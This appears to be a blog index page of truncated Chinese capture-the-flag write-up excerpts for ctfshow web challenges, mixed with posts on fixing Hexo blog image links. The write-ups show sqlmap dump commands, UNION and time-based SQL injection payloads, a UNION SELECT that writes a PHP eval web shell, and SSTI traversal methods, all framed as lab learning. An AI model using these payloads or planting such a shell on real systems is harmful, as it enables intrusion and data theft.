web301-302上来就是登录页面，看了代码发现没有过滤，尝试使用sqlmap直接开注入。 1$sql="select sds_password from sds_user where sds_username='".$username."' order by id limit 1;"; 1sqlmap -u http://e870d81c-dd88-4dc4-b990-760221d286bb.challenge.ctf.show/checklogin.php --data 'userid=1&userpwd=1' -D sds -C sds_password --dump --batch 看看密码，sqlmap这个必须盲注，只盲了密码，猜账号为admin。登陆成功。但是登录进入之后没啥用，似乎得写入shell。之前还真没怎么用过sql写文件，这里记一下： 1userid=1'+union select "<?php eval($_POST[1]);?>&quo ...

本文中所有{ {、{ %，其余同理中本来应该没有空格，但是由于与Nunjunks语法碰撞，因此修改。 https://blog.csdn.net/q20010619/article/details/120493997 代码块： 1234变量块 { {} } 用于将表达式打印到模板输出注释块 {##} 注释控制块 { %% } 可以声明变量，也可以执行语句行声明 ## 可以有和{ %% }相同的效果 常用方法： 12345678910111213141516171819202122232425262728__class__ 查看对象所在的类__mro__ 查看继承关系和调用顺序，返回元组__base__ 返回基类__bases__ 返回基类元组__subclasses__() 返回子类列表__init__ 调用初始化函数，可以用来跳到__globals____global ...

https://blog.csdn.net/q20010619/article/details/120729447 这里面的漏洞都是struts2漏洞，使用建议下载Struts2scan工具辅助学习。 https://github.com/HatBoy/Struts2-Scan.githttps://github.com/shack2/Struts2VulsTools 通过页面回显的错误消息来判断，页面不回显错误消息时则无效 通过网页后缀来判断，如.do .action，有可能不准 如果配置文件中常数extension的值以逗号结尾或者有空值，指明了action可以不带后缀，那么不带后缀的uri也可能是struts2框架搭建的 如果使用Struts2的rest插件，其默认的struts-plugin.xml指定的请求后缀为xhtml,xml和json 判断 /struts/webconsole.html 是否存在来进行判断，需要 devMode 为 true web279 https://www.freebuf.com/column/224041.h ...

web254和反序列化没啥关系，可能只是来了解一下代码： 1234567891011121314151617181920212223242526272829303132333435363738394041error_reporting(0);highlight_file(__FILE__);include('flag.php');class ctfShowUser{ public $username='xxxxxx'; public $password='xxxxxx'; public $isVip=false; public function checkVip(){ return $this->isVip; } public function login($u,$p){ if($this->username===$u&&$this->password===$p){ $this->isVip=true; ...

web214时间盲注终于知道是哪来的注入点了，在主页的网络包中有一个select.js中能看到： 12345678910$.ajax({ url:'api/', dataType:"json", type:'post', data:{ ip:returnCitySN["cip"], debug:0 }}); 向其中可以存在注入点。hackbar测试一下：有sql执行，继续构建测试payload： 1ip=if(substr(database(),1,1)=('c'),sleep(5),1)&debug=0 然后就是写脚本先贴一下佬们的脚本： 12345678910111213141516171819202122232425262728293031323334353637"""Author:Y4tacker"""import requestsurl = &quo ...

如果你用了我之前发的脚本，你就会发现这个图片删后缀解析功能失效了。不仅如此，以前用过生成的所有图片也失效了。如果预览的话，会提示如下：但是当多次访问之后就会提示下载，但是图片仍然不会解析。本来以为用不了了，打算搞个接口自己刷新，但是教程太乱了，而且感觉应该还有绕过的办法。经过多次调试发现，这里有一个referer验证。没有referer的访问是会被403的。因此这个问题就变成了如何让访问具有referer验证，或者说不让他验证。在网上查了很久发现一段代码： 1<meta name="referrer" content="no-referrer" /> 用它来拒绝referer的请求。原文提示说，需要放在主题文件下的post.ejs文件。如果到这里，你的博客正好有.ejs文件。那就少了很多折腾。以我的为例（butterfly）这个主题文件下的内容全是以.pug格式为后缀，因此，原封不动照抄是会一片红的。研究了挺长时间，找了找语法，得到了一种修改办法。 1meta(name="referrer", content=&q ...

web191跟上题一样，由于换了一章，就重新叙述一下。布尔盲注需要先找到一个可改变的注入点。比如： admin' and 0#时返回的是用户名不存在 admin' and 1#返回的是密码错误 由此编写脚本：这题还是用是190的脚本即可直接使用paayload： 123456789101112131415161718192021222324252627282930313233343536373839# -*- encoding: utf-8 -*-"""@File : SQL布尔盲注2.py @Contact : 2997453446@qq.com@Blog : natro92.github.io @Modify Time @Author @Version @Desciption------------ ------- -------- -----------2023/7/11 22:02 natro92 1.0 None"& ...

web171 1$sql = "select username,password from user where username !='flag' and id = '".$_GET['id']."' limit 1;"; 三栏一眼丁真，直接内容拼入即可。 1-1' union select 1,2,database() --+ 查询库名： 1-1' union select 1,2,group_concat(schema_name) from information_schema.schemata --+ information_schema,test,mysql,performance_schema,ctfshow_web查询表名： 1-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+ ...

用了语雀的md编辑器，感觉typora有点用不惯，但是语雀的到处图片会有限制，虽然能够浏览，但是使用hexo之后就不行了，寻找了几个方法，最好用的就是修改图片格式，将地址后的参数删除掉。一个一个改太费劲了，因此写了一个简单的python脚本来代替机械劳动。 12345678910111213141516171819202122232425262728293031323334# -*- encoding: utf-8 -*-"""@File : YuQueShareLink.py@Contact : 2997453446@qq.com@Blog : natro92.github.io@Modify Time @Author @Version @Desciption------------ ------- -------- -----------2023/5/16 21:04 natro92 1.0 将语雀链接在导出到博客时可以正常使用""" ...